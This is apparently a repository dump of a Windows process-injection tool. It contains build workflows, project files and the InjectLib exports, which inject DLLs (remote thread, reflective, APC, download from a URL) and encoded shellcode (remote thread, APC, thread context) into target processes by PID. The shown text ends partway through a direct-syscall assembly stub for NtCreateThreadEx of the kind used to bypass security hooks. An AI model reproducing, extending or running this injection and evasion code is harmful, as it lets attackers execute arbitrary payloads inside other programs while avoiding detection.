├── .github
    ├── build_workflow.yml
    └── workflows
    │   └── build_workflow.yml
├── .gitignore
├── ICON.ico
├── InjectLib
    ├── InjectLib.cpp
    ├── InjectLib.h
    ├── InjectLib.vcxproj
    ├── InjectLib.vcxproj.filters
    ├── InjectLib.vcxproj.user
    ├── app
    │   ├── Injector.cpp
    │   ├── Injector.h
    │   ├── S-Wisper-asm.x64.asm
    │   ├── S-Wisper.c
    │   ├── S-Wisper.h
    │   └── utils
    │   │   ├── crypto.hpp
    │   │   └── query.hpp
    ├── cpp.hint
    ├── dllmain.cpp
    ├── framework.h
    ├── pch.cpp
    ├── pch.h
    └── test
    │   └── dll_test.py
├── LICENSE
├── README.assets
    ├── image-20240205124826998.png
    ├── image-20240205125036362.png
    ├── image-20240205131316348.png
    ├── image-20240205131438254.png
    ├── image-20240205135210534.png
    ├── image-20240205135709302.png
    ├── image-20240205140305351.png
    ├── image-20240205140815069.png
    ├── image-20240205141410967.png
    ├── image-20240216112653373.png
    ├── image-20240216113029381.png
    ├── image-20240216113432922.png
    ├── image-20240216113917066.png
    ├── image-20240401105145205.png
    ├── image-20240401105329537.png
    ├── image-20240520101531243.png
    ├── image-20240520101608876.png
    ├── image-20240520101704029.png
    ├── image-20240606124658850.png
    ├── image-20240606131806622.png
    ├── image-20240606224950591.png
    ├── image-20240606225058387.png
    ├── image-20250217173155506.png
    ├── image-20250217193111847.png
    ├── image-20250217193433513.png
    ├── image-20250219105506042.png
    └── image-20250219105558106.png
├── README.md
├── Test Files
    ├── TestDll_x64.dll
    ├── TestDll_x86.dll
    ├── reflective_x64.dll
    └── reflective_x86.dll
├── X-Inject.sln
├── X-Inject
    ├── S-Inject.aps
    ├── S-Inject.rc
    ├── X-Inject.vcxproj
    ├── X-Inject.vcxproj.filters
    ├── X-Inject.vcxproj.user
    ├── app
    │   ├── Injector.cpp
    │   ├── Injector.h
    │   ├── S-Wisper-asm.x64.asm
    │   ├── S-Wisper.c
    │   ├── S-Wisper.h
    │   ├── utils
    │   │   ├── crypto.hpp
    │   │   ├── error.hpp
    │   │   ├── helper.hpp
    │   │   ├── query.hpp
    │   │   ├── spectrum.h
    │   │   └── theme.hpp
    │   ├── window.cpp
    │   └── window.h
    ├── ext
    │   ├── imconfig.h
    │   ├── imgui.cpp
    │   ├── imgui.h
    │   ├── imgui_demo.cpp
    │   ├── imgui_draw.cpp
    │   ├── imgui_impl_dx11.cpp
    │   ├── imgui_impl_dx11.h
    │   ├── imgui_impl_win32.cpp
    │   ├── imgui_impl_win32.h
    │   ├── imgui_internal.h
    │   ├── imgui_tables.cpp
    │   ├── imgui_widgets.cpp
    │   ├── imstb_rectpack.h
    │   ├── imstb_textedit.h
    │   └── imstb_truetype.h
    ├── global.cpp
    ├── global.h
    ├── imgui.ini
    ├── main.cpp
    ├── resource.h
    └── test.dll
├── bin
    ├── InjectLib_x64.dll
    ├── InjectLib_x86.dll
    ├── S-Inject_x64_gui.exe
    ├── S-Inject_x86_gui.exe
    ├── S-inject_x64.exe
    └── S-inject_x86.exe
├── old_README.assets
    ├── image-20240205125036362.png
    ├── image-20240205131316348.png
    ├── image-20240205131438254.png
    ├── image-20240205135210534.png
    ├── image-20240205135709302.png
    ├── image-20240205140305351.png
    ├── image-20240205140815069.png
    ├── image-20240401105145205.png
    └── image-20240401105329537.png
└── old_README.md


/.github/build_workflow.yml:
--------------------------------------------------------------------------------
 1 | # This workflow uses actions that are not certified by GitHub.
 2 | # They are provided by a third-party and are governed by
 3 | # separate terms of service, privacy policy, and support
 4 | # documentation.
 5 | 
 6 | name: MSBuild
 7 | 
 8 | on:
 9 |   push:
10 |     branches: [ "main" ]
11 |   pull_request:
12 |     branches: [ "main" ]
13 | 
14 | env:
15 |   # Path to the solution file relative to the root of the project.
16 |   SOLUTION_FILE_PATH: .
17 | 
18 |   # Configuration type to build.
19 |   # You can convert this to a build matrix if you need coverage of multiple configuration types.
20 |   # https://docs.github.com/actions/learn-github-actions/managing-complex-workflows#using-a-build-matrix
21 |   BUILD_CONFIGURATION: Release
22 | 
23 | permissions:
24 |   contents: read
25 | 
26 | jobs:
27 |   build:
28 |     runs-on: windows-latest
29 | 
30 |     steps:
31 |     - uses: actions/checkout@v4
32 | 
33 |     - name: Add MSBuild to PATH
34 |       uses: microsoft/setup-msbuild@v1.0.2
35 | 
36 |     - name: Restore NuGet packages
37 |       working-directory: ${{env.GITHUB_WORKSPACE}}
38 |       run: nuget restore ${{env.SOLUTION_FILE_PATH}}
39 | 
40 |     - name: Build
41 |       working-directory: ${{env.GITHUB_WORKSPACE}}
42 |       # Add additional options to the MSBuild command line here (like platform or verbosity level).
43 |       # See https://docs.microsoft.com/visualstudio/msbuild/msbuild-command-line-reference
44 |       run: |
45 |         msbuild ${{env.SOLUTION_FILE_PATH}} /m
46 |                 /p:Configuration=${{env.BUILD_CONFIGURATION}}
47 |                 /p:CppStandard=stdcpp20
48 | 


--------------------------------------------------------------------------------
/.github/workflows/build_workflow.yml:
--------------------------------------------------------------------------------
 1 | # This workflow uses actions that are not certified by GitHub.
 2 | # They are provided by a third-party and are governed by
 3 | # separate terms of service, privacy policy, and support
 4 | # documentation.
 5 | 
 6 | name: MSBuild
 7 | 
 8 | on:
 9 |   push:
10 |     branches: [ "main" ]
11 |   pull_request:
12 |     branches: [ "main" ]
13 | 
14 | env:
15 |   # Path to the solution file relative to the root of the project.
16 |   SOLUTION_FILE_PATH: .
17 | 
18 |   # Configuration type to build.
19 |   # You can convert this to a build matrix if you need coverage of multiple configuration types.
20 |   # https://docs.github.com/actions/learn-github-actions/managing-complex-workflows#using-a-build-matrix
21 |   BUILD_CONFIGURATION: Release
22 | 
23 | permissions:
24 |   contents: read
25 | 
26 | jobs:
27 |   build:
28 |     runs-on: windows-latest
29 | 
30 |     steps:
31 |     - uses: actions/checkout@v4
32 | 
33 |     - name: Add MSBuild to PATH
34 |       uses: microsoft/setup-msbuild@v1.0.2
35 | 
36 |     - name: Restore NuGet packages
37 |       working-directory: ${{env.GITHUB_WORKSPACE}}
38 |       run: nuget restore ${{env.SOLUTION_FILE_PATH}}
39 | 
40 |     - name: Build
41 |       working-directory: ${{env.GITHUB_WORKSPACE}}
42 |       # Add additional options to the MSBuild command line here (like platform or verbosity level).
43 |       # See https://docs.microsoft.com/visualstudio/msbuild/msbuild-command-line-reference
44 |       run: msbuild /m /p:Configuration=${{env.BUILD_CONFIGURATION}} ${{env.SOLUTION_FILE_PATH}}
45 | 


--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
1 | .vs
2 | .gitignore
3 | **/Debug
4 | **/Release
5 | **/x64
6 | *.pdb
7 | *.idb
8 | *.ini


--------------------------------------------------------------------------------
/ICON.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Joe1sn/S-inject/0bb92bd0cc9eeafc4bea4fe15ddd5f9143838c90/ICON.ico


--------------------------------------------------------------------------------
/InjectLib/InjectLib.cpp:
--------------------------------------------------------------------------------
 1 | // InjectLib.cpp : 定义 DLL 的导出函数。
 2 | //
 3 | 
 4 | #include "pch.h"
 5 | #include "framework.h"
 6 | #include "InjectLib.h"
 7 | 
 8 | //远程线程注入DLL
 9 | INJECTLIB_API bool rmtdll(const char* dllPath, DWORD pid) {
10 |     if (pid == 0)
11 |         return false;
12 |     auto injector = Injector(dllPath);
13 |     injector.remoteThreadInject(pid);
14 |     return true;
15 | }
16 | 
17 | //反射式注入DLL
18 | INJECTLIB_API bool refdll(const char* dllPath, DWORD pid) {
19 |     if (pid == 0)
20 |         return false;
21 |     auto injector = Injector(dllPath);
22 |     injector.reflectInject(pid);
23 |     return true;
24 | }
25 | //APC队列注入DLL
26 | INJECTLIB_API bool apcdll(const char* dllPath, DWORD pid) {
27 |     if (pid == 0)
28 |         return false;
29 |     auto injector = Injector(dllPath);
30 |     injector.apcInject(pid);
31 |     return true;
32 | }
33 | //从网络加载DLL注入DLL
34 | INJECTLIB_API bool net(const char* dllPath, DWORD pid) {
35 |     if (pid == 0)
36 |         return false;
37 |     auto injector = Injector(dllPath);
38 |     injector.internetInject(pid, dllPath);
39 |     return true;
40 | }
41 | //远程线程注入Shellcode
42 | INJECTLIB_API bool rmtsc(const char* shellcode, DWORD pid) {
43 |     if (pid == 0)
44 |         return false;
45 |     auto injector = Injector();
46 |     injector.shellcodeInject(shellcode, pid);
47 |     return true;
48 | }
49 | //APC队列注入Shellcode
50 | INJECTLIB_API bool apcsc(const char* shellcode, DWORD pid) {
51 |     if (pid == 0)
52 |         return false;
53 |     auto injector = Injector();
54 |     injector.apcShellcodeInject(shellcode, pid);
55 |     return true;
56 | }
57 | //上下文注入Shellcode
58 | INJECTLIB_API bool ctxsc(const char* shellcode, DWORD pid) {
59 |     if (pid == 0)
60 |         return false;
61 |     auto injector = Injector();
62 |     injector.contextShellcodeInject(shellcode, pid);
63 |     return true;
64 | }
65 | 
66 | //上下文注入Shellcode
67 | INJECTLIB_API DWORD getPID(const char* proc_name_cstr) {
68 |     auto injector = Injector();
69 |     return injector.getPidByName(proc_name_cstr);
70 | }
71 | 
72 | /*
73 | // 这是导出变量的一个示例
74 | INJECTLIB_API int nInjectLib=0;
75 | 
76 | // 这是导出函数的一个示例。
77 | INJECTLIB_API int fnInjectLib(void)
78 | {
79 |     return 0;
80 | }
81 | 
82 | // 这是已导出类的构造函数。
83 | CInjectLib::CInjectLib()
84 | {
85 |     return;
86 | }
87 | */


--------------------------------------------------------------------------------
/InjectLib/InjectLib.h:
--------------------------------------------------------------------------------
 1 | // 下列 ifdef 块是创建使从 DLL 导出更简单的
 2 | // 宏的标准方法。此 DLL 中的所有文件都是用命令行上定义的 INJECTLIB_EXPORTS
 3 | // 符号编译的。在使用此 DLL 的
 4 | // 任何项目上不应定义此符号。这样，源文件中包含此文件的任何其他项目都会将
 5 | // INJECTLIB_API 函数视为是从 DLL 导入的，而此 DLL 则将用此宏定义的
 6 | // 符号视为是被导出的。
 7 | #ifdef INJECTLIB_EXPORTS
 8 | #define INJECTLIB_API __declspec(dllexport)
 9 | #else
10 | #define INJECTLIB_API __declspec(dllimport)
11 | #endif
12 | 
13 | #include "./app/Injector.h"
14 | 
15 | #include <iostream>
16 | #include <string>
17 | 
18 | 
19 | extern "C" INJECTLIB_API bool rmtdll(const char* proc_name_cstr, DWORD pid);
20 | extern "C" INJECTLIB_API bool refdll(const char* proc_name_cstr, DWORD pid);
21 | extern "C" INJECTLIB_API bool apcdll(const char* proc_name_cstr, DWORD pid);
22 | extern "C" INJECTLIB_API bool net(const char* proc_name_cstr, DWORD pid);
23 | extern "C" INJECTLIB_API bool rmtsc(const char* shellcode, DWORD pid);
24 | extern "C" INJECTLIB_API bool apcsc(const char* shellcode, DWORD pid);
25 | extern "C" INJECTLIB_API bool ctxsc(const char* shellcode, DWORD pid);
26 | extern "C" INJECTLIB_API DWORD getPID(const char* proc_name_cstr);
27 | 
28 | /*
29 | // 此类是从 dll 导出的
30 | class INJECTLIB_API CInjectLib {
31 | public:
32 | 	CInjectLib(void);
33 | 	// TODO: 在此处添加方法。
34 | };
35 | 
36 | extern INJECTLIB_API int nInjectLib;
37 | 
38 | INJECTLIB_API int fnInjectLib(void);
39 | */


--------------------------------------------------------------------------------
/InjectLib/InjectLib.vcxproj:
--------------------------------------------------------------------------------
  1 | <?xml version="1.0" encoding="utf-8"?>
  2 | <Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  3 |   <ItemGroup Label="ProjectConfigurations">
  4 |     <ProjectConfiguration Include="Debug|Win32">
  5 |       <Configuration>Debug</Configuration>
  6 |       <Platform>Win32</Platform>
  7 |     </ProjectConfiguration>
  8 |     <ProjectConfiguration Include="Release|Win32">
  9 |       <Configuration>Release</Configuration>
 10 |       <Platform>Win32</Platform>
 11 |     </ProjectConfiguration>
 12 |     <ProjectConfiguration Include="Debug|x64">
 13 |       <Configuration>Debug</Configuration>
 14 |       <Platform>x64</Platform>
 15 |     </ProjectConfiguration>
 16 |     <ProjectConfiguration Include="Release|x64">
 17 |       <Configuration>Release</Configuration>
 18 |       <Platform>x64</Platform>
 19 |     </ProjectConfiguration>
 20 |   </ItemGroup>
 21 |   <PropertyGroup Label="Globals">
 22 |     <VCProjectVersion>17.0</VCProjectVersion>
 23 |     <Keyword>Win32Proj</Keyword>
 24 |     <ProjectGuid>{dae5dcc7-f89a-4265-aa2b-bbf9fb48c96e}</ProjectGuid>
 25 |     <RootNamespace>InjectLib</RootNamespace>
 26 |     <WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
 27 |   </PropertyGroup>
 28 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
 29 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
 30 |     <ConfigurationType>DynamicLibrary</ConfigurationType>
 31 |     <UseDebugLibraries>true</UseDebugLibraries>
 32 |     <PlatformToolset>v143</PlatformToolset>
 33 |     <CharacterSet>Unicode</CharacterSet>
 34 |   </PropertyGroup>
 35 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
 36 |     <ConfigurationType>DynamicLibrary</ConfigurationType>
 37 |     <UseDebugLibraries>false</UseDebugLibraries>
 38 |     <PlatformToolset>v143</PlatformToolset>
 39 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 40 |     <CharacterSet>Unicode</CharacterSet>
 41 |   </PropertyGroup>
 42 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
 43 |     <ConfigurationType>DynamicLibrary</ConfigurationType>
 44 |     <UseDebugLibraries>true</UseDebugLibraries>
 45 |     <PlatformToolset>v143</PlatformToolset>
 46 |     <CharacterSet>Unicode</CharacterSet>
 47 |   </PropertyGroup>
 48 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
 49 |     <ConfigurationType>DynamicLibrary</ConfigurationType>
 50 |     <UseDebugLibraries>false</UseDebugLibraries>
 51 |     <PlatformToolset>v143</PlatformToolset>
 52 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 53 |     <CharacterSet>Unicode</CharacterSet>
 54 |   </PropertyGroup>
 55 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
 56 |   <ImportGroup Label="ExtensionSettings">
 57 |   </ImportGroup>
 58 |   <ImportGroup Label="Shared">
 59 |   </ImportGroup>
 60 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 61 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 62 |   </ImportGroup>
 63 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 64 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 65 |   </ImportGroup>
 66 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
 67 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 68 |   </ImportGroup>
 69 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
 70 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 71 |   </ImportGroup>
 72 |   <PropertyGroup Label="UserMacros" />
 73 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
 74 |     <TargetName>InjectLib</TargetName>
 75 |     <GenerateManifest>false</GenerateManifest>
 76 |   </PropertyGroup>
 77 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 78 |     <TargetName>InjectLib</TargetName>
 79 |     <GenerateManifest>false</GenerateManifest>
 80 |   </PropertyGroup>
 81 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
 82 |     <TargetName>InjectLib</TargetName>
 83 |     <GenerateManifest>false</GenerateManifest>
 84 |   </PropertyGroup>
 85 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 86 |     <TargetName>InjectLib</TargetName>
 87 |     <GenerateManifest>false</GenerateManifest>
 88 |   </PropertyGroup>
 89 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 90 |     <ClCompile>
 91 |       <WarningLevel>Level3</WarningLevel>
 92 |       <SDLCheck>true</SDLCheck>
 93 |       <PreprocessorDefinitions>WIN32;_DEBUG;INJECTLIB_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)</PreprocessorDefinitions>
 94 |       <ConformanceMode>true</ConformanceMode>
 95 |       <PrecompiledHeader>NotUsing</PrecompiledHeader>
 96 |       <PrecompiledHeaderFile>pch.h</PrecompiledHeaderFile>
 97 |     </ClCompile>
 98 |     <Link>
 99 |       <SubSystem>Windows</SubSystem>
100 |       <GenerateDebugInformation>false</GenerateDebugInformation>
101 |       <EnableUAC>false</EnableUAC>
102 |       <AdditionalDependencies>d3d11.lib;Crypt32.lib;wininet.lib;$(CoreLibraryDependencies);%(AdditionalDependencies)</AdditionalDependencies>
103 |       <ManifestFile />
104 |       <ProgramDatabaseFile />
105 |     </Link>
106 |   </ItemDefinitionGroup>
107 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
108 |     <ClCompile>
109 |       <WarningLevel>Level3</WarningLevel>
110 |       <FunctionLevelLinking>true</FunctionLevelLinking>
111 |       <IntrinsicFunctions>true</IntrinsicFunctions>
112 |       <SDLCheck>true</SDLCheck>
113 |       <PreprocessorDefinitions>WIN32;NDEBUG;INJECTLIB_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)</PreprocessorDefinitions>
114 |       <ConformanceMode>true</ConformanceMode>
115 |       <PrecompiledHeader>NotUsing</PrecompiledHeader>
116 |       <PrecompiledHeaderFile>pch.h</PrecompiledHeaderFile>
117 |     </ClCompile>
118 |     <Link>
119 |       <SubSystem>Windows</SubSystem>
120 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
121 |       <OptimizeReferences>true</OptimizeReferences>
122 |       <GenerateDebugInformation>false</GenerateDebugInformation>
123 |       <EnableUAC>false</EnableUAC>
124 |       <AdditionalDependencies>d3d11.lib;Crypt32.lib;wininet.lib;$(CoreLibraryDependencies);%(AdditionalDependencies)</AdditionalDependencies>
125 |       <ManifestFile />
126 |       <ProgramDatabaseFile />
127 |     </Link>
128 |   </ItemDefinitionGroup>
129 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
130 |     <ClCompile>
131 |       <WarningLevel>Level3</WarningLevel>
132 |       <SDLCheck>true</SDLCheck>
133 |       <PreprocessorDefinitions>_DEBUG;INJECTLIB_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)</PreprocessorDefinitions>
134 |       <ConformanceMode>true</ConformanceMode>
135 |       <PrecompiledHeader>NotUsing</PrecompiledHeader>
136 |       <PrecompiledHeaderFile>pch.h</PrecompiledHeaderFile>
137 |     </ClCompile>
138 |     <Link>
139 |       <SubSystem>Windows</SubSystem>
140 |       <GenerateDebugInformation>false</GenerateDebugInformation>
141 |       <EnableUAC>false</EnableUAC>
142 |       <AdditionalDependencies>d3d11.lib;Crypt32.lib;wininet.lib;$(CoreLibraryDependencies);%(AdditionalDependencies)</AdditionalDependencies>
143 |       <ManifestFile />
144 |       <ProgramDatabaseFile />
145 |     </Link>
146 |   </ItemDefinitionGroup>
147 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
148 |     <ClCompile>
149 |       <WarningLevel>Level3</WarningLevel>
150 |       <FunctionLevelLinking>true</FunctionLevelLinking>
151 |       <IntrinsicFunctions>true</IntrinsicFunctions>
152 |       <SDLCheck>true</SDLCheck>
153 |       <PreprocessorDefinitions>NDEBUG;INJECTLIB_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)</PreprocessorDefinitions>
154 |       <ConformanceMode>true</ConformanceMode>
155 |       <PrecompiledHeader>NotUsing</PrecompiledHeader>
156 |       <PrecompiledHeaderFile>pch.h</PrecompiledHeaderFile>
157 |     </ClCompile>
158 |     <Link>
159 |       <SubSystem>Windows</SubSystem>
160 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
161 |       <OptimizeReferences>true</OptimizeReferences>
162 |       <GenerateDebugInformation>false</GenerateDebugInformation>
163 |       <EnableUAC>false</EnableUAC>
164 |       <AdditionalDependencies>d3d11.lib;Crypt32.lib;wininet.lib;$(CoreLibraryDependencies);%(AdditionalDependencies)</AdditionalDependencies>
165 |       <ManifestFile />
166 |       <ProgramDatabaseFile />
167 |     </Link>
168 |   </ItemDefinitionGroup>
169 |   <ItemGroup>
170 |     <CustomBuild Include="app\S-Wisper-asm.x64.asm">
171 |       <FileType>Document</FileType>
172 |       <Command Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">ml64 /Fo $(IntDir)%(fileName).obj /c /Cp app\%(fileName).asm</Command>
173 |       <Outputs Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">$(IntDir)%(fileName).obj;%(Outputs)</Outputs>
174 |       <Command Condition="'$(Configuration)|$(Platform)'=='Release|x64'">ml64 /Fo $(IntDir)%(fileName).obj /c /Cp app\%(fileName).asm</Command>
175 |       <Outputs Condition="'$(Configuration)|$(Platform)'=='Release|x64'">$(IntDir)%(fileName).obj;%(Outputs)</Outputs>
176 |     </CustomBuild>
177 |     <None Include="cpp.hint" />
178 |   </ItemGroup>
179 |   <ItemGroup>
180 |     <ClInclude Include="app\Injector.h" />
181 |     <ClInclude Include="app\utils\crypto.hpp" />
182 |     <ClInclude Include="app\utils\query.hpp" />
183 |     <ClInclude Include="app\S-Wisper.h" />
184 |     <ClInclude Include="framework.h" />
185 |     <ClInclude Include="InjectLib.h" />
186 |     <ClInclude Include="pch.h" />
187 |   </ItemGroup>
188 |   <ItemGroup>
189 |     <ClCompile Include="app\Injector.cpp" />
190 |     <ClCompile Include="app\S-Wisper.c" />
191 |     <ClCompile Include="dllmain.cpp" />
192 |     <ClCompile Include="InjectLib.cpp" />
193 |     <ClCompile Include="pch.cpp">
194 |       <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">Create</PrecompiledHeader>
195 |       <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">Create</PrecompiledHeader>
196 |       <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">Create</PrecompiledHeader>
197 |       <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">Create</PrecompiledHeader>
198 |     </ClCompile>
199 |   </ItemGroup>
200 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
201 |   <ImportGroup Label="ExtensionTargets">
202 |   </ImportGroup>
203 | </Project>


--------------------------------------------------------------------------------
/InjectLib/InjectLib.vcxproj.filters:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="utf-8"?>
 2 | <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
 3 |   <ItemGroup>
 4 |     <Filter Include="源文件">
 5 |       <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
 6 |       <Extensions>cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
 7 |     </Filter>
 8 |     <Filter Include="头文件">
 9 |       <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
10 |       <Extensions>h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd</Extensions>
11 |     </Filter>
12 |     <Filter Include="资源文件">
13 |       <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
14 |       <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
15 |     </Filter>
16 |   </ItemGroup>
17 |   <ItemGroup>
18 |     <None Include="cpp.hint" />
19 |   </ItemGroup>
20 |   <ItemGroup>
21 |     <ClInclude Include="framework.h">
22 |       <Filter>头文件</Filter>
23 |     </ClInclude>
24 |     <ClInclude Include="InjectLib.h">
25 |       <Filter>头文件</Filter>
26 |     </ClInclude>
27 |     <ClInclude Include="pch.h">
28 |       <Filter>头文件</Filter>
29 |     </ClInclude>
30 |     <ClInclude Include="app\Injector.h">
31 |       <Filter>头文件</Filter>
32 |     </ClInclude>
33 |     <ClInclude Include="app\S-Wisper.h">
34 |       <Filter>头文件</Filter>
35 |     </ClInclude>
36 |     <ClInclude Include="app\utils\query.hpp">
37 |       <Filter>头文件</Filter>
38 |     </ClInclude>
39 |     <ClInclude Include="app\utils\crypto.hpp">
40 |       <Filter>头文件</Filter>
41 |     </ClInclude>
42 |   </ItemGroup>
43 |   <ItemGroup>
44 |     <ClCompile Include="InjectLib.cpp">
45 |       <Filter>源文件</Filter>
46 |     </ClCompile>
47 |     <ClCompile Include="dllmain.cpp">
48 |       <Filter>源文件</Filter>
49 |     </ClCompile>
50 |     <ClCompile Include="pch.cpp">
51 |       <Filter>源文件</Filter>
52 |     </ClCompile>
53 |     <ClCompile Include="app\Injector.cpp">
54 |       <Filter>源文件</Filter>
55 |     </ClCompile>
56 |     <ClCompile Include="app\S-Wisper.c">
57 |       <Filter>源文件</Filter>
58 |     </ClCompile>
59 |   </ItemGroup>
60 |   <ItemGroup>
61 |     <CustomBuild Include="app\S-Wisper-asm.x64.asm">
62 |       <Filter>源文件</Filter>
63 |     </CustomBuild>
64 |   </ItemGroup>
65 | </Project>


--------------------------------------------------------------------------------
/InjectLib/InjectLib.vcxproj.user:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="utf-8"?>
2 | <Project ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
3 |   <PropertyGroup>
4 |     <ShowAllFiles>true</ShowAllFiles>
5 |   </PropertyGroup>
6 | </Project>


--------------------------------------------------------------------------------
/InjectLib/app/Injector.h:
--------------------------------------------------------------------------------
 1 | #pragma once
 2 | 
 3 | #include "./utils/query.hpp"
 4 | 
 5 | #include <Windows.h>
 6 | #include <winternl.h>
 7 | #include <iostream>
 8 | #include <tlhelp32.h>
 9 | #include <vector>
10 | 
11 | #define DEREF( name )*(UINT_PTR *)(name)
12 | #define DEREF_64( name )*(DWORD64 *)(name)
13 | #define DEREF_32( name )*(DWORD *)(name)
14 | #define DEREF_16( name )*(WORD *)(name)
15 | #define DEREF_8( name )*(BYTE *)(name)
16 | 
17 | #define STATUS_SUCCESS 0x00000000L
18 | 
19 | 
20 | typedef struct _ProcessInfo
21 | {
22 | 	DWORD pid;
23 | 	std::wstring processName;
24 | }ProcessInfo, * pProcessInfo;
25 | 
26 | class Injector
27 | {
28 | public:
29 | 	typedef void (Injector::* CallbackFunction)(DWORD pid);	//�ص�����
30 | 
31 | private:
32 | 	CallbackFunction callback_;
33 | 	std::string DllPath;
34 | 	bool exist;
35 | 
36 | 	HMODULE hNtDll;
37 | 
38 | 	fnNtQuerySystemInformation NtQuerySystemInformation;
39 | 
40 | public:
41 | 	Injector(std::string dll_path);
42 | 	Injector();
43 | 	~Injector();
44 | 	void unInject(DWORD pid);
45 | 
46 | 	void remoteThreadInject(DWORD pid);
47 | 	void reflectInject(DWORD pid);
48 | 	void apcInject(DWORD pid);
49 | 	void fiberInject(DWORD pid);//TODO
50 | 	void internetInject(DWORD pid, std::string url);
51 | 	
52 | 
53 | 	std::vector<ProcessInfo> injectList();
54 | 
55 | 	void shellcodeInject(std::string basedsc, DWORD pid);
56 | 	void apcShellcodeInject(std::string basedsc, DWORD pid);
57 | 	void contextShellcodeInject(std::string basedsc, DWORD pid);
58 | 
59 | 	void dllPathSetter(std::string dll_path);
60 | 	void callBackSetter(CallbackFunction InjecMethod);
61 | 	DWORD getPidByName(LPCSTR procName);
62 | 
63 | private:
64 | 	bool bFileExists(std::string filePath);
65 | 	bool bPreInjectCheck(DWORD pid);
66 | 	bool bInjectable(DWORD pid);
67 | 	bool bGetModule(DWORD pid, MODULEENTRY32& result);
68 | 	void atomReflectInject(DWORD pid, std::string url ="");
69 | 
70 | 	DWORD dwGetOffset(HANDLE Image, CHAR* FuncName);
71 | 	DWORD Rva2Offset(DWORD dwRva, UINT_PTR uiBaseAddress);
72 | };


--------------------------------------------------------------------------------
/InjectLib/app/S-Wisper-asm.x64.asm:
--------------------------------------------------------------------------------
 1 | .code
 2 | 
 3 | EXTERN SW3_GetSyscallNumber: PROC
 4 | 
 5 | Sw3NtCreateThreadEx PROC
 6 | 	mov [rsp +8], rcx          ; Save registers.
 7 | 	mov [rsp+16], rdx
 8 | 	mov [rsp+24], r8
 9 | 	mov [rsp+32], r9
10 | 	sub rsp, 28h
11 | 	mov ecx, 084A94AFEh        ; Load function hash into ECX.
12 | 	call SW3_GetSyscallNumber              ; Resolve function hash into syscall number.
13 | 	add rsp, 28h
14 | 	mov rcx, [rsp+8]                      ; Restore registers.
15 | 	mov rdx, [rsp+16]
16 | 	mov r8, [rsp+24]
17 | 	mov r9, [rsp+32]
18 | 	mov r10, rcx
